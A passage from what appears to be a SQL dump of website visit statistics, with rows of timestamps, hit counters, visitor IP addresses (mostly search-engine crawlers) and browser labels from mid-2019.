,'5.45.207.79','other'),(432117,1561856640,2,2,0,0,'188.166.22.77','chrome'),(432118,1561856708,1,1,0,0,'207.46.13.11','other'),(432119,1561856748,1,1,0,0,'66.249.66.222','chrome'),(432120,1561856834,1,1,0,0,'66.249.66.218','chrome'),(432121,1561857692,2,2,0,0,'66.249.66.222','chrome'),(432122,1561857779,1,1,0,0,'207.46.13.228','other'),(432123,1561858187,2,2,0,0,'207.46.13.11','other'),(432124,1561858411,1,1,0,0,'193.106.30.98','chrome'),(432125,1561858469,1,1,0,0,'207.46.13.6','other'),(432126,1561859173,1,1,0,0,'207.46.13.228','other'),(432127,1561859392,1,1,0,0,'66.249.66.128','chrome'),(432128,1561859587,2,2,0,0,'207.46.13.6','other'),(432129,1561860081,1,1,0,0,'66.249.66.130','chrome'),(432130,1561860106,1,1,0,0,'66.249.66.220','chrome'),(432131,1561860253,1,1,0,0,'66.249.66.222','chrome'),(432132,1561861272,2,2,0,0,'66.249.66.222','chrome'),(432133,1561862053,1,1,0,0,'91.209.11.236','other'),(432134,1561863133,1,1,0,0,'207.46.13.11','other'),(432135,1561863189,2,2,0,0,'91.209.11.236','other'),(432136,1561864239,2,2,0,0,'157.55.39.137','other'),(432137,1561865069,1,1,0,0,'66.249.66.218','chrome'),(432138,1561865389,1,1,0,0,'141.8.142.103','other'),(432139,1561865440,1,1,0,0,'178.154.244.11','other'),(432140,1561865731,1,1,0,0,'66.249.66.220','chrome'),(432141,1561866020,1,1,0,0,'157.55.39.137','other'),(432142,1561866449,2,2,0,0,'8.29.198.25','other'),(432143,1561866863,1,1,0,0,'213.180.203.40','other'),(432144,1561867443,2,2,0,0,'157.55.39.164','other'),(432145,1561867601,1,1,0,0,'157.55.39.137','other'),(432146,1561867632,1,1,0,0,'52.33.178.224','other'),(432147,1561868600,2,2,0,0,'91.209.11.236','other'),(432148,1561869298,1,1,0,0,'5.45.207.79','other'),(432149,1561869355,2,2,0,0,'157.55.39.137','other'),(432150,1561869389,1,1,0,0,'66.249.66.218','chrome'),(432151,1561869870,1,1,0,0,'91.196.178.129','firefox'),(432152,1561870368,2,2,0,0,'66.249.66.220','chrome'),(432153,1561871470,1,1,0,0,'66.249.66.220','chrome'),(432154,1561872343,1,1,0,0,'109.70.100.26','other'),(432155,1561872399,1,1,0,0,'95.163.255.151','other'),(432156,1561872504,1,1,0,0,'157.55.39.164','other'),(432157,1561873268,1,1,0,0,'176.15.25.136','msie'),(432158,1561873791,1,1,0,0,'66.249.66.222','chrome'),(432159,1561873909,1,1,0,0,'66.249.66.218','chrome'),(432160,1561874848,2,2,0,0,'5.45.207.79','other'),(432161,1561875385,1,1,0,0,'157.55.39.137','other'),(432162,1561876861,1,1,0,0,'40.77.167.145','other'),(432163,1561877311,1,1,0,0,'8.29.198.26','other'),(432164,1561877321,1,1,0,0,'8.29.198.27','other'),(432165,1561878021,1,1,0,0,'95.163.255.166','other'),(432166,1561878076,1,1,0,0,'91.209.11.236','other'),(432167,1561878304,1,1,0,0,'66.249.66.220','chrome'),(432168,1561878353,1,1,0,0,'178.154.244.11','other'),(432169,1561878391,2,2,0,0,'151.80.144.187','other'),(432170,1561878734,1,1,0,0,'66.249.66.222','chrome'),(432171,1561879378,5,5,0,0,'157.55.39.137','other'),(432172,1561879459,2,2,0,0,'157.55.39.79','other'),(432173,1561879466,3,3,0,0,'40.77.167.13','other'),(432174,1561879505,2,2,0,0,'157.55.39.164','other'),(432175,1561879857,1,1,0,0,'178.255.215.94','other'),(432176,1561881049,1,1,0,0,'157.55.39.164','other'),(432177,1561881092,2,2,0,0,'5.45.207.19','other'),(432178,1561882604,1,1,0,0,'91.196.178.97','chrome'),(432179,1561882913,1,1,0,0,'157.55.39.164','other'),(432180,1561883081,1,1,0,0,'5.45.207.8','other'),(432181,1561883089,1,1,0,0,'157.55.39.79','other'),(432182,1561883115,1,1,0,0,'37.9.113.148','other'),(432183,1561883880,1,1,0,0,'134.249.146.125','chrome'),(432184,1561883935,1,1,0,0,'66.249.66.220','chrome'),(432185,1561884677,1,1,0,0,'66.249.66.222','chrome'),(432186,1561884882,1,1,0,0,'66.249.66.218','chrome'),(432187,1561885038,1,1,0,0,'157.55.39.164','other'),(432188,1561885782,1,1,0,0,'66.249.66.222','chrome'),(432189,1561885842,1,1,0,0,'178.154.244.11','other'),(432190,1561886055,1,1,0,0,'193.106.30.98','chrome'),(432191,1561886387,2,2,0,0,'157.55.39.137','other'),(432192,1561886837,1,1,0,0,'157.55.39.79','other'),(432193,1561887109,1,1,0,0,'5.45.207.79','other'),(432194,1561887462,2,2,0,0,'213.180.203.53','other'),(432195,1561888150,1,1,0,0,'8.29.198.25','other'),(432196,1561888151,1,1,0,0,'95.163.255.182','other'),(432197,1561888182,1,1,0,0,'8.29.198.26','other'),(432198,1561888671,1,1,0,0,'157.55.39.137','other'),(432199,1561889007,1,1,0,0,'109.74.154.72','chrome'),(432200,1561889716,1,1,0,0,'66.249.66.130','chrome'),(432201,1561889871,1,1,0,0,'157.55.39.137','other'),(432202,1561889960,1,1,0,0,'157.55.39.79','other'),(432203,1561889980,2,2,0,0,'40.77.167.13','other'),(432204,1561890009,2,2,0,0,'134.249.146.125','chrome'),(432205,1561890071,1,1,0,0,'95.163.255.94','other'),(432206,1561890472,1,1,0,0,'58.250.125.165','other'),(432207,1561891321,1,1,0,0,'157.55.39.137','other'),(432208,1561891869,1,1,0,0,'157.55.39.79','other'),(432209,1561891897,1,1,0,0,'40.77.167.208','other'),(432210,1561892829,2,2,0,0,'157.55.39.79','other'),(432211,1561892889,1,1,0,0,'66.249.66.218','chrome'),(432212,1561893316,1,1,0,0,'40.77.167.13','other'),(432213,1561894855,2,1,1,0,'66.249.66.220',''),(432214,1561895257,2,2,0,0,'66.249.66.218','chrome'),(432215,1561895623,1,1,0,0,'95.163.255.93','other'),(432216,1561896913,1,1,0,0,'141.8.183.23','other'),(432217,1561897091,1,1,0,0,'95.108.181.54','other'),(432218,1561897368,1,1,0,0,'40.77.167.208','other'),(432219,1561898262,1,1,0,0,'40.84.140.119','chrome'),(432220,1561898989,1,1,0,0,'8.29.198.25','other'),(432221,1561899027,1,1,0,0,'8.29.198.26','other'),(432222,1561899445,1,1,0,0,'95.163.255.191','other'),(432223,1561899457,1,1,0,0,'141.8.142.65','other'),(432224,1561899461,1,1,0,0,'40.77.167.26','other'),(432225,1561899596,1,1,0,0,'40.77.167.208','other'),(432226,1561899697,1,1,0,0,'40.77.167.172','other'),(432227,1561899828,2,2,0,0,'157.55.39.79','other'),(432228,1561900623,1,1,0,0,'66.249.66.220','chrome'),(432229,1561900701,1,1,0,0,'40.77.167.172','other'),(432230,1561900800,1,1,0,0,'5.45.207.19','other'),(432231,1561901260,1,1,0,0,'141.8.142.103','other'),(432232,1561901506,1,1,0,0,'66.249.66.222','chrome'),(432233,1561901594,1,1,0,0,'141.8.142.65','other'),(432234,1561902529,1,1,0,0,'95.163.255.96','other'),(432235,1561903152,1,1,0,0,'5.45.207.19','other'),(432236,1561903470,1,1,0,0,'95.163.255.96','other'),(432237,1561903472,1,1,0,0,'95.163.255.92','other'),(432238,1561905450,1,1,0,0,'66.249.66.130','chrome'),(432239,1561905452,1,1,0,0,'66.249.66.128','chrome'),(432240,1561905727,1,1,0,0,'40.77.167.218','other'),(432241,1561906797,1,1,0,0,'207.46.13.149','other'),(432242,1561906875,1,1,0,0,'157.55.39.67','other'),(432243,1561907106,1,1,0,0,'95.163.255.175','other'),(432244,1561907791,1,1,0,0,'66.249.66.222','chrome'),(432245,1561908722,1,1,0,0,'157.55.39.67','other'),(432246,1561908740,2,2,0,0,'66.249.66.220','chrome'),(432247,1561908817,1,1,0,0,'46.211.101.155','chrome'),(432248,1561909045,1,1,0,0,'141.8.142.103','other'),(432249,1561909097,1,1,0,0,'66.249.66.222','chrome'),(432250,1561909400,1,1,0,0,'178.154.244.11','other'),(432251,1561909836,1,1,0,0,'8.29.198.25','other'),(432252,1561909892,1,1,0,0,'8.29.198.26','other'),(432253,1561910041,1,1,0,0,'157.55.39.69','other'),(432254,1561910748,2,2,0,0,'157.55.39.67','other'),(432255,1561911098,1,1,0,0,'207.46.13.127','other'),(432256,1561911140,1,1,0,0,'66.249.66.222','chrome'),(432257,1561911330,1,1,0,0,'207.46.13.149','other'),(432258,1561911465,1,1,0,0,'66.249.66.218','chrome'),(432259,1561911745,1,1,0,0,'157.55.39.67','other'),(432260,1561911754,1,1,0,0,'193.106.30.98','chrome'),(432261,1561911908,1,1,0,0,'178.154.244.11','other'),(432262,1561912838,1,1,0,0,'157.55.39.69','other'),(432263,1561913006,1,1,0,0,'157.55.39.67','other'),(432264,1561914773,1,1,0,0,'157.55.39.67','other'),(432265,1561914848,1,1,0,0,'66.249.66.220','chrome'),(432266,1561915307,1,1,0,0,'207.46.13.202','other'),(432267,1561916795,1,1,0,0,'157.55.39.67','other'),(432268,1561917127,1,1,0,0,'66.249.66.218','chrome'),(432269,1561917746,2,2,0,0,'157.55.39.86','other'),(432270,1561919053,1,1,0,0,'66.249.66.222','chrome'),(432271,1561919240,1,1,0,0,'46.96.44.74','chrome'),(432272,1561919304,1,1,0,0,'157.55.39.89','other'),(432273,1561919359,1,1,0,0,'157.55.39.86','other'),(432274,1561919769,2,2,0,0,'178.154.244.11','other'),(432275,1561919773,1,1,0,0,'141.8.142.103','other'),(432276,1561920679,1,1,0,0,'8.29.198.25','other'),(432277,1561920745,1,1,0,0,'8.29.198.26','other'),(432278,1561920870,1,1,0,0,'157.55.39.86','other'),(432279,1561921020,1,1,0,0,'95.163.255.176','other'),(432280,1561922153,1,1,0,0,'157.55.39.89','other'),(432281,1561922250,1,1,0,0,'95.163.255.194','other'),(432282,1561922643,1,1,0,0,'95.108.213.4','other'),(432283,1561923230,2,2,0,0,'66.249.66.222','chrome'),(432284,1561923422,1,1,0,0,'40.77.167.17','other'),(432285,1561923940,1,1,0,0,'66.249.66.132','chrome'),(432286,1561924023,1,1,0,0,'207.46.13.99','other'),(432287,1561924258,1,1,0,0,'66.249.66.218','chrome'),(432288,1561924458,3,3,0,0,'178.154.244.11','other'),(432289,1561924588,1,1,0,0,'66.249.66.220','chrome'),(432290,1561925237,1,1,0,0,'40.77.167.17','other'),(432291,1561925245,1,1,0,0,'66.249.66.218','chrome'),(432292,1561925601,1,1,0,0,'66.249.66.220','chrome'),(432293,1561925608,1,1,0,0,'66.249.66.128','chrome'),(432294,1561925927,2,2,0,0,'66.249.66.222','chrome'),(432295,1561926002,2,2,0,0,'207.46.13.99','other'),(432296,1561926831,1,1,0,0,'91.209.11.236','other'),(432297,1561927292,1,1,0,0,'37.73.136.32','chrome'),(432298,1561927769,1,1,0,0,'207.46.13.178','other'),(432299,1561927925,1,1,0,0,'66.249.66.222','chrome'),(432300,1561928571,2,2,0,0,'178.154.244.11','other'),(432301,1561929039,1,1,0,0,'157.55.39.4','other'),(432302,1561929584,1,1,0,0,'66.249.66.218','chrome'),(432303,1561929594,1,1,0,0,'40.77.167.17','other'),(432304,1561930274,1,1,0,0,'66.249.66.128','chrome'),(432305,1561930808,1,1,0,0,'66.249.66.222','chrome'),(432306,1561930849,1,1,0,0,'207.46.13.99','other'),(432307,1561931016,1,1,0,0,'178.154.244.11','other'),(432308,1561931524,1,1,0,0,'8.29.198.26','other'),(432309,1561931614,1,1,0,0,'8.29.198.25','other'),(432310,1561931958,2,2,0,0,'157.55.39.4','other'),(432311,1561933514,1,1,0,0,'207.46.13.178','other'),(432312,1561933623,1,1,0,0,'95.163.255.191','other'),(432313,1561934126,1,1,0,0,'66.249.66.220','chrome'),(432314,1561934407,1,1,0,0,'157.55.39.4','other'),(432315,1561935233,1,1,0,0,'207.46.13.99','other'),(432316,1561936114,1,1,0,0,'5.45.207.19','other'),(432317,1561937093,1,1,0,0,'66.249.66.218','chrome'),(432318,1561937506,1,1,0,0,'157.55.39.227','other'),(432319,1561937733,1,1,0,0,'66.249.66.222','chrome'),(432320,1561937752,1,1,0,0,'193.106.30.98','chrome'),(432321,1561938017,1,1,0,0,'207.46.13.178','other'),(432322,1561938517,2,2,0,0,'207.46.13.241','other'),(432323,1561938584,3,3,0,0,'207.46.13.99','other'),(432324,1561938676,1,1,0,0,'66.249.66.222','chrome'),(432325,1561938701,1,1,0,0,'95.163.255.169','other'),(432326,1561939435,2,2,0,0,'207.46.13.241','other'),(432327,1561939767,1,1,0,0,'5.45.207.19','other'),(432328,1561940014,1,1,0,0,'95.163.255.96','other'),(432329,1561940301,2,2,0,0,'157.55.39.4','other'),(432330,1561940508,1,1,0,0,'66.249.66.218','chrome'),(432331,1561940683,1,1,0,0,'207.46.13.241','other'),(432332,1561940692,1,1,0,0,'95.163.255.159','other'),(432333,1561941623,1,1,0,0,'66.249.66.220','chrome'),(432334,1561941928,1,1,0,0,'66.249.66.128','chrome'),(432335,1561942053,1,1,0,0,'5.45.207.79','other'),(432336,1561942375,1,1,0,0,'8.29.198.26','other'),(432337,1561942382,1,1,0,0,'207.46.13.178','other'),(432338,1561942465,1,1,0,0,'8.29.198.27','other'),(432339,1561942593,1,1,0,0,'157.55.39.4','other'),(432340,1561943742,1,1,0,0,'207.46.13.99','other'),(432341,1561943753,1,1,0,0,'95.163.255.163','other'),(432342,1561944760,2,2,0,0,'66.249.66.218','chrome'),(432343,1561945042,1,1,0,0,'5.45.207.79','other'),(432344,1561945198,1,1,0,0,'207.46.13.241','other'),(432345,1561945323,1,1,0,0,'66.249.66.222','chrome'),(432346,1561945335,1,1,0,0,'207.46.13.178','other'),(432347,1561945460,1,1,0,0,'66.249.66.220','chrome'),(432348,1561947341,1,1,0,0,'207.46.13.5','other'),(432349,1561950377,1,1,0,0,'207.46.13.91','other'),(432350,1561951392,1,1,0,0,'207.46.13.89','other'),(432351,1561951766,1,1,0,0,'207.46.13.92','other'),(432352,1561952623,1,1,0,0,'66.249.66.128','chrome'),(432353,1561953135,1,1,0,0,'207.46.13.91','other'),(432354,1561953137,1,1,0,0,'95.163.255.196','other'),(432355,1561953189,1,1,0,0,'40.77.167.198','other'),(432356,1561953221,1,1,0,0,'8.29.198.25','other'),(432357,1561953329,1,1,0,0,'8.29.198.27','other'),(432358,1561953368,1,1,0,0,'207.46.13.89','other'),(432359,1561953382,1,1,0,0,'207.46.13.92','other'),(432360,1561953436,1,1,0,0,'66.249.66.218','chrome'),(432361,1561954468,1,1,0,0,'207.46.13.92','other'),(432362,1561955977,1,1,0,0,'5.45.207.79','other'),(432363,1561956252,2,2,0,0,'66.249.66.222','chrome'),(432364,1561956260,1,1,0,0,'173.212.225.106','firefox'),(432365,1561956289,1,1,0,0,'138.197.169.241','firefox'),(432366,1561956562,1,1,0,0,'207.46.13.91','other'),(432367,1561957034,1,1,0,0,'95.163.255.95','other'),(432368,1561957146,1,1,0,0,'13.66.139.0','other'),(432369,1561957245,1,1,0,0,'40.77.167.116','other'),(432370,1561957917,1,1,0,0,'91.209.11.236','other'),(432371,1561958706,1,1,0,0,'66.249.66.220','chrome'),(432372,1561958891,3,3,0,0,'66.249.66.218','chrome'),(432373,1561959334,1,1,0,0,'91.196.178.77','chrome'),(432374,1561959412,1,1,0,0,'109.70.100.29','other'),(432375,1561959819,1,1,0,0,'66.249.66.220','chrome'),(432376,1561960341,1,1,0,0,'91.196.178.67','chrome'),(432377,1561960417,2,2,0,0,'66.249.66.218','chrome'),(432378,1561960539,1,1,0,0,'66.249.66.222','chrome'),(432379,1561961064,1,1,0,0,'40.77.167.114','other'),(432380,1561961497,1,1,0,0,'66.249.66.130','chrome'),(432381,1561961677,1,1,0,0,'141.8.142.103','other'),(432382,1561961857,1,1,0,0,'91.196.178.77','chrome'),(432383,1561962307,2,2,0,0,'66.249.66.218','chrome'),(432384,1561962598,1,1,0,0,'5.45.207.79','other'),(432385,1561962602,1,1,0,0,'5.45.207.19','other'),(432386,1561962682,1,1,0,0,'207.46.13.91','other'),(432387,1561963583,1,1,0,0,'91.124.118.86','chrome'),(432388,1561963609,1,1,0,0,'66.249.66.218','chrome'),(432389,1561963715,1,1,0,0,'85.173.113.88','other'),(432390,1561964091,1,1,0,0,'8.29.198.25','other'),(432391,1561964178,1,1,0,0,'8.29.198.27','other'),(432392,1561964594,1,1,0,0,'40.77.167.116','other'),(432393,1561965130,1,1,0,0,'66.249.66.220','chrome'),(432394,1561965467,1,1,0,0,'95.163.255.98','other'),(432395,1561965679,4,4,0,0,'40.77.167.114','other'),(432396,1561965683,3,3,0,0,'157.55.39.159','other'),(432397,1561965688,2,2,0,0,'40.77.167.116','other'),(432398,1561965693,2,2,0,0,'40.77.167.142','other'),(432399,1561965849,1,1,0,0,'5.45.207.79','other'),(432400,1561966214,1,1,0,0,'66.249.66.222','chrome'),(432401,1561966651,1,1,0,0,'66.249.66.220','chrome'),(432402,1561966916,1,1,0,0,'66.249.66.218','chrome'),(432403,1561968169,1,1,0,0,'40.77.167.114','other'),(432404,1561968270,1,1,0,0,'95.67.67.66','chrome'),(432405,1561968646,1,1,0,0,'66.249.66.222','chrome'),(432406,1561968890,1,1,0,0,'157.55.39.159','other'),(432407,1561969328,1,1,0,0,'157.55.39.143','other'),(432408,1561970076,1,1,0,0,'40.77.167.114','other'),(432409,1561970288,1,1,0,0,'13.66.139.0','other'),(432410,1561970610,1,1,0,0,'66.249.66.222','chrome'),(432411,1561971042,2,2,0,0,'66.249.66.218','chrome'),(432412,1561971597,1,1,0,0,'157.55.39.143','other'),(432413,1561971796,1,1,0,0,'91.196.178.77','chrome'),(432414,1561972281,1,1,0,0,'66.249.66.222','chrome'),(432415,1561973224,1,1,0,0,'37.54.18.128','chrome'),(432416,1561973646,1,1,0,0,'66.249.66.220','chrome'),(432417,1561974688,1,1,0,0,'66.249.66.222','chrome'),(432418,1561974954,1,1,0,0,'8.29.198.25','other'),(432419,1561975020,1,1,0,0,'8.29.198.26','other'),(432420,1561975641,1,1,0,0,'95.163.255.158','other'),(432421,1561976042,1,1,0,0,'66.249.66.218','chrome'),(432422,1561976438,1,1,0,0,'109.74.154.72','chrome'),(432423,1561977122,1,1,0,0,'66.249.66.218','chrome'),(432424,1561977444,1,1,0,0,'157.55.39.143','other'),(432425,1561977519,1,1,0,0,'66.249.66.128','chrome'),(432426,1561978259,1,1,0,0,'66.249.66.222','chrome'),(432427,1561978342,1,1,0,0,'66.249.66.218','chrome'),(432428,1561978344,1,1,0,0,'157.55.39.7','other'),(432429,1561978460,1,1,0,0,'94.242.54.22','chrome'),(432430,1561979588,1,1,0,0,'66.249.66.130','chrome'),(432431,1561979886,1,1,0,0,'91.196.177.46','firefox'),(432432,1561980255,1,1,0,0,'157.55.39.7','other'),(432433,1561980535,1,1,0,0,'66.249.66.220','chrome'),(432434,1561980587,1,1,0,0,'40.77.167.113','other'),(432435,1561981231,1,1,0,0,'66.249.66.218','chrome'),(432436,1561982388,1,1,0,0,'157.55.39.102','other'),(432437,1561983405,1,1,0,0,'207.46.13.173','other'),(432438,1561983722,1,1,0,0,'91.196.178.100','chrome'),(432439,1561984210,1,1,0,0,'91.196.177.46','chrome'),(432440,1561985058,1,1,0,0,'66.249.66.130','chrome'),(432441,1561985646,1,1,0,0,'207.46.13.173','other'),(432442,1561985823,1,1,0,0,'8.29.198.27','other'),(432443,1561985898,1,1,0,0,'8.29.198.26','other'),(432444,1561986185,1,1,0,0,'207.46.13.74','other'),(432445,1561986239,1,1,0,0,'37.55.225.27','chrome'),(432446,1561987999,1,1,0,0,'66.249.66.218','chrome'),(432447,1561988779,1,1,0,0,'91.196.178.74','chrome'),(432448,1561989484,1,1,0,0,'40.77.167.39','other'),(432449,1561990527,1,1,0,0,'66.249.66.222','chrome'),(432450,1561990608,2,2,0,0,'40.77.167.54','other'),(432451,1561991014,2,2,0,0,'40.77.167.39','other'),(432452,1561991658,1,1,0,0,'91.124.182.170','firefox'),(432453,1561992186,1,1,0,0,'66.249.66.132','chrome'),(432454,1561992843,1,1,0,0,'95.163.255.98','other'),(432455,1561992999,1,1,0,0,'40.77.167.54','other'),(432456,1561993106,2,2,0,0,'66.249.66.218','chrome'),(432457,1561993706,1,1,0,0,'157.55.39.154','other'),(432458,1561993815,1,1,0,0,'46.211.100.103','chrome'),(432459,1561995328,1,1,0,0,'46.211.123.26','chrome'),(432460,1561996685,1,1,0,0,'157.55.39.132','other'),(432461,1561996709,1,1,0,0,'8.29.198.26','other'),(432462,1561996780,1,1,0,0,'8.29.198.25','other'),(432463,1561996781,1,1,0,0,'40.77.167.39','other'),(432464,1561997484,3,3,0,0,'144.76.81.229','other'),(432465,1561997926,1,1,0,0,'176.213.157.199','chrome'),(432466,1561998398,1,1,0,0,'66.249.66.222','chrome'),(432467,1561998431,1,1,0,0,'141.8.132.16','other'),(432468,1561998605,1,1,0,0,'91.196.178.86','firefox'),(432469,1561999211,1,1,0,0,'40.77.167.143','other'),(432470,1561999293,1,1,0,0,'40.77.167.172','other'),(432471,1561999399,2,2,0,0,'66.249.66.220','chrome'),(432472,1561999421,1,1,0,0,'66.249.66.218','chrome'),(432473,1561999441,3,3,0,0,'66.249.66.222','chrome'),(432474,1562000576,1,1,0,0,'46.211.97.1','chrome'),(432475,1562000765,1,1,0,0,'82.145.208.108','other'),(432476,1562000839,1,1,0,0,'31.13.127.21','other'),(432477,1562000840,1,1,0,0,'31.13.127.22','other'),(432478,1562000847,1,1,0,0,'31.13.127.26','other'),(432479,1562000849,1,1,0,0,'31.13.127.17','other'),(432480,1562000894,1,1,0,0,'66.220.149.45','other'),(432481,1562001186,1,1,0,0,'157.55.39.110','other'),(432482,1562001658,1,1,0,0,'13.66.139.0','other'),(432483,1562001716,1,1,0,0,'66.249.66.218','chrome'),(432484,1562002326,1,1,0,0,'207.46.13.96','other'),(432485,1562003264,1,1,0,0,'66.249.66.220','chrome'),(432486,1562003648,1,1,0,0,'66.249.66.218','chrome'),(432487,1562004026,1,1,0,0,'5.45.207.79','other'),(432488,1562004239,1,1,0,0,'178.154.244.11','other'),(432489,1562004510,1,1,0,0,'66.249.66.222','chrome'),(432490,1562005228,1,1,0,0,'66.249.66.220','chrome'),(432491,1562005647,1,1,0,0,'207.46.13.96','other'),(432492,1562006749,1,1,0,0,'207.46.13.98','other'),(432493,1562006948,1,1,0,0,'66.249.66.218','chrome'),(432494,1562007107,17,17,0,0,'148.251.131.16','other'),(432495,1562007579,1,1,0,0,'8.29.198.27','other'),(432496,1562007663,1,1,0,0,'8.29.198.26','other'),(432497,1562007950,1,1,0,0,'207.46.13.98','other'),(432498,1562009274,3,3,0,0,'66.249.66.218','chrome'),(432499,1562009714,1,1,0,0,'95.163.255.181','other'),(432500,1562010177,2,2,0,0,'95.213.141.126','opera'),(432501,1562010401,1,1,0,0,'40.77.167.190','other'),(432502,1562010475,1,1,0,0,'178.154.171.24','other'),(432503,1562010886,4,4,0,0,'207.46.13.97','other'),(432504,1562011972,1,1,0,0,'66.249.66.220','chrome'),(432505,1562012033,1,1,0,0,'66.249.66.130','chrome'),(432506,1562012780,1,1,0,0,'207.46.13.34','other'),(432507,1562012955,1,1,0,0,'207.46.13.32','other'),(432508,1562013239,2,2,0,0,'66.249.66.130','chrome'),(432509,1562013320,1,1,0,0,'66.249.66.222','chrome'),(432510,1562013802,1,1,0,0,'207.46.13.33','other'),(432511,1562013817,1,1,0,0,'66.249.66.218','chrome'),(432512,1562015553,1,1,0,0,'157.55.39.193','other'),(432513,1562015788,1,1,0,0,'95.163.255.96','other'),(432514,1562016155,1,1,0,0,'157.55.39.91','other'),(432515,1562016283,1,1,0,0,'207.46.13.167','other'),(432516,1562016556,2,2,0,0,'66.249.66.218','chrome'),(432517,1562017245,1,1,0,0,'157.55.39.193','other'),(432518,1562017288,1,1,0,0,'66.249.66.222','chrome'),(432519,1562018462,1,1,0,0,'8.29.198.25','other'),(432520,1562018534,1,1,0,0,'8.29.198.26','other'),(432521,1562019023,1,1,0,0,'213.180.203.61','other'),(432522,1562019109,1,1,0,0,'87.250.224.47','other'),(432523,1562019115,1,1,0,0,'66.249.66.128','chrome'),(432524,1562019290,1,1,0,0,'207.46.13.167','other'),(432525,1562020464,1,1,0,0,'66.249.66.128','chrome'),(432526,1562020554,2,2,0,0,'66.249.66.220','chrome'),(432527,1562020604,1,1,0,0,'66.249.66.222','chrome'),(432528,1562021347,1,1,0,0,'157.55.39.93','other'),(432529,1562021512,1,1,0,0,'66.249.66.218','chrome'),(432530,1562021691,1,1,0,0,'207.46.13.167','other'),(432531,1562023185,1,1,0,0,'94.242.54.22','chrome'),(432532,1562023192,1,1,0,0,'66.249.66.218','chrome'),(432533,1562023817,1,1,0,0,'144.76.176.171','other'),(432534,1562024563,1,1,0,0,'66.249.66.222','chrome'),(432535,1562025627,1,1,0,0,'157.55.39.100','other'),(432536,1562026308,1,1,0,0,'66.249.66.220','chrome'),(432537,1562026710,1,1,0,0,'157.55.39.193','other'),(432538,1562027043,1,1,0,0,'66.249.66.130','chrome'),(432539,1562028092,1,1,0,0,'66.249.66.220','chrome'),(432540,1562028446,1,1,0,0,'66.249.66.128','chrome'),(432541,1562028472,2,2,0,0,'66.249.66.222','chrome'),(432542,1562028519,2,2,0,0,'207.46.13.171','other'),(432543,1562029140,1,1,0,0,'207.46.13.105','other'),(432544,1562029331,2,2,0,0,'8.29.198.27','other'),(432545,1562029375,1,1,0,0,'178.154.171.24','other'),(432546,1562029699,1,1,0,0,'217.69.143.66','other'),(432547,1562030152,1,1,0,0,'157.55.39.120','other'),(432548,1562030247,1,1,0,0,'66.249.66.222','chrome'),(432549,1562031191,1,1,0,0,'141.8.142.103','other'),(432550,1562031292,1,1,0,0,'157.55.39.155','other'),(432551,1562031580,1,1,0,0,'157.55.39.120','other'),(432552,1562032509,1,1,0,0,'157.55.39.120','other'),(432553,1562034151,1,1,0,0,'157.55.39.120','other'),(432554,1562034468,2,2,0,0,'60.191.38.77','firefox'),(432555,1562034781,1,1,0,0,'157.55.39.107','other'),(432556,1562035604,51,51,0,0,'194.247.173.123','other'),(432557,1562035773,1,1,0,0,'13.66.139.0','other'),(432558,1562036011,1,1,0,0,'193.106.30.98','chrome'),(432559,1562036239,1,1,0,0,'66.249.66.222','chrome'),(432560,1562036498,1,1,0,0,'207.46.13.105','other'),(432561,1562036540,1,1,0,0,'178.154.244.11','other'),(432562,1562037006,1,1,0,0,'66.249.66.218','chrome'),(432563,1562037181,1,1,0,0,'66.249.66.132','chrome'),(432564,1562037189,1,1,0,0,'213.180.203.40','other'),(432565,1562037227,1,1,0,0,'95.163.255.186','other'),(432566,1562037625,1,1,0,0,'193.106.30.98','chrome'),(432567,1562038086,1,1,0,0,'207.46.13.105','other'),(432568,1562038656,1,1,0,0,'66.249.66.220','chrome'),(432569,1562039496,6,6,0,0,'178.63.13.154','other'),(432570,1562040198,2,2,0,0,'8.29.198.27','other'),(432571,1562041146,2,0,2,0,'66.249.66.218',''),(432572,1562041186,1,1,0,0,'66.249.66.218','chrome'),(432573,1562041222,2,0,2,0,'66.249.66.222',''),(432574,1562041468,1,1,0,0,'207.46.13.105','other'),(432575,1562042260,1,1,0,0,'209.17.97.10','other'),(432576,1562045597,1,1,0,0,'91.227.206.120','chrome'),(432577,1562045919,1,1,0,0,'87.120.36.157','other'),(432578,1562046828,1,1,0,0,'66.249.66.128','chrome'),(432579,1562047381,1,1,0,0,'91.124.182.170','firefox'),(432580,1562048211,1,1,0,0,'66.249.66.222','chrome'),(432581,1562050293,2,2,0,0,'157.55.39.120','other'),(432582,1562050811,1,1,0,0,'91.196.178.169','chrome'),(432583,1562051060,1,1,0,0,'8.29.198.26','other'),(432584,1562051142,1,1,0,0,'8.29.198.27','other'),(432585,1562051177,1,1,0,0,'77.111.244.21','chrome'),(432586,1562051646,1,1,0,0,'178.154.244.11','other'),(432587,1562052089,1,1,0,0,'77.111.244.21','chrome'),(432588,1562052250,2,2,0,0,'157.55.39.155','other'),(432589,1562052255,1,1,0,0,'157.55.39.107','other'),(432590,1562052260,3,3,0,0,'207.46.13.105','other'),(432591,1562052264,3,3,0,0,'157.55.39.120','other'),(432592,1562052772,1,1,0,0,'91.196.177.46','chrome'),(432593,1562052956,1,1,0,0,'5.45.207.19','other'),(432594,1562053074,1,1,0,0,'13.66.139.0','other'),(432595,1562053899,1,1,0,0,'46.147.182.211','msie'),(432596,1562053903,1,1,0,0,'95.28.51.40','msie'),(432597,1562054055,1,1,0,0,'91.196.178.189','chrome'),(432598,1562054553,1,1,0,0,'178.93.103.154','chrome'),(432599,1562056954,1,1,0,0,'157.55.39.155','other'),(432600,1562057041,1,1,0,0,'207.46.13.105','other'),(432601,1562057364,1,1,0,0,'95.216.20.84','other'),(432602,1562057459,1,1,0,0,'66.249.66.222','chrome'),(432603,1562057742,1,1,0,0,'95.132.39.121','chrome'),(432604,1562058903,1,1,0,0,'37.9.113.20','other'),(432605,1562058953,1,1,0,0,'91.196.178.72','chrome'),(432606,1562058989,1,1,0,0,'178.154.171.24','other'),(432607,1562060680,1,1,0,0,'91.196.178.132','chrome'),(432608,1562060889,1,1,0,0,'207.46.13.105','other'),(432609,1562061614,1,1,0,0,'66.249.66.218','chrome'),(432610,1562061855,1,1,0,0,'157.55.39.155','other'),(432611,1562061935,1,1,0,0,'8.29.198.26','other'),(432612,1562062019,1,1,0,0,'8.29.198.25','other'),(432613,1562062471,1,1,0,0,'109.74.154.72','chrome'),(432614,1562062723,1,1,0,0,'66.249.66.220','chrome'),(432615,1562062762,2,2,0,0,'157.55.39.107','other'),(432616,1562064289,1,1,0,0,'91.196.179.138','chrome'),(432617,1562064522,1,1,0,0,'94.242.54.22','chrome'),(432618,1562064695,1,1,0,0,'5.45.207.79','other'),(432619,1562064800,1,1,0,0,'141.8.142.103','other'),(432620,1562066759,1,1,0,0,'46.211.74.10